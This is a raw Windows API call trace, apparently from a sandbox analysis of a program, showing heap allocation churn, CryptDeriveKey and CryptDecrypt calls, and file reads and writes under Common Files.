| out: hHeap=0xc60000) returned 1 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83430 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83460 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810c0 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb778 [0264.846] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe835c8 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.846] PeekMessageW (in: lpMsg=0x91ef14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91ef14) returned 0 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16f0 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835c8 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83610 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835f8 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.846] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83640 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.846] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810f0 [0264.847] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.847] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81120 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.847] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83670 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83628 [0264.847] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83658 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.847] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f40 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81150 [0264.847] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f70 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.847] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.847] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16c0 [0264.848] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.848] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834a8 [0264.848] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.848] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16d0 [0264.848] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fa0 [0264.848] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.848] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.848] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.848] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1660 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.849] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16a0 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0264.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0xe80fa0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0264.850] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.850] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1640 | out: hHeap=0xc60000) returned 1 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1610 | out: hHeap=0xc60000) returned 1 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.851] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.851] CryptDeriveKey (in: hProv=0xcc72b8, Algid=0x660e, hBaseData=0xef1d20, dwFlags=0x1, phKey=0x91ef48 | out: phKey=0x91ef48*=0xef1d60) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80eb0 | out: hHeap=0xc60000) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83358 | out: hHeap=0xc60000) returned 1 [0264.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.852] CryptDestroyHash (hHash=0xef1d20) returned 1 [0264.853] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0264.854] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0264.854] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x91f680 | out: lpNewFilePointer=0x0) returned 1 [0264.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb598 [0264.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834f0 [0264.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1750 [0264.859] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e8 [0264.861] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb728 [0264.861] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834d8 [0264.861] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1830 [0264.861] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1770 [0264.862] ReadFile (in: hFile=0x61c, lpBuffer=0xf09bc8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x91f6f8, lpOverlapped=0x0 | out: lpBuffer=0xf09bc8*, lpNumberOfBytesRead=0x91f6f8*=0x10, lpOverlapped=0x0) returned 1 [0264.863] ReadFile (in: hFile=0x61c, lpBuffer=0xf09bc8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x91f6f8, lpOverlapped=0x0 | out: lpBuffer=0xf09bc8*, lpNumberOfBytesRead=0x91f6f8*=0x0, lpOverlapped=0x0) returned 1 [0264.864] CryptGetKeyParam (in: hKey=0xef1d60, dwParam=0x7, pbData=0xef15e0, pdwDataLen=0x91ea30, dwFlags=0x0 | out: pbData=0xef15e0*=0x660e, pdwDataLen=0x91ea30*=0x4) returned 1 [0264.864] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1530 [0264.864] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca7380 [0264.864] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.864] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83400 [0264.864] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.864] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833e8 [0264.864] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1540 [0264.864] CryptDecrypt (in: hKey=0xef1d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xef50e0, pdwDataLen=0x91ef60 | out: pbData=0xef50e0, pdwDataLen=0x91ef60) returned 0 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1500 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca7380 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xebb868 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832f8 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83328 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83310 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1510 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83310 | out: hHeap=0xc60000) returned 1 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1510 | out: hHeap=0xc60000) returned 1 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83328 | out: hHeap=0xc60000) returned 1 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83328 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83310 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80dc0 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1510 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80dc0 | out: hHeap=0xc60000) returned 1 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1510 | out: hHeap=0xc60000) returned 1 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83310 | out: hHeap=0xc60000) returned 1 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83310 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80dc0 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832c8 [0264.865] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1510 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832c8 | out: hHeap=0xc60000) returned 1 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1510 | out: hHeap=0xc60000) returned 1 [0264.865] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80dc0 | out: hHeap=0xc60000) returned 1 [0264.887] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80dc0 [0264.888] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832c8 [0264.888] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832e0 [0264.888] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1510 [0264.888] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832e0 | out: hHeap=0xc60000) returned 1 [0264.888] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1510 | out: hHeap=0xc60000) returned 1 [0264.888] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832c8 | out: hHeap=0xc60000) returned 1 [0264.888] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832c8 [0264.888] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832e0 [0264.888] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80d90 [0264.888] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1510 [0264.888] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80d90 | out: hHeap=0xc60000) returned 1 [0264.888] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1510 | out: hHeap=0xc60000) returned 1 [0264.888] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832e0 | out: hHeap=0xc60000) returned 1 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832e0 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80d90 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83298 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1510 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83298 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1510 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80d90 | out: hHeap=0xc60000) returned 1 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca858 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xef3ec8 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80d90 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1510 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83298 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe832b0 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80d60 [0264.889] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1520 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80d60 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1520 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832b0 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1580 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1590 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef15b0 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef15c0 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1540 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1550 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb840 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83460 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef15d0 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f70 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80e50 | out: hHeap=0xc60000) returned 1 [0264.889] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833a0 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80e80 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80df0 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80e20 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83400 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833e8 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83388 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f40 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81120 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83628 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83640 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83670 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef3e68 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca838 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810f0 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83340 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1530 | out: hHeap=0xc60000) returned 1 [0264.890] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1530 [0264.890] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.890] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca75a8 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1600 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca75a8 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.891] 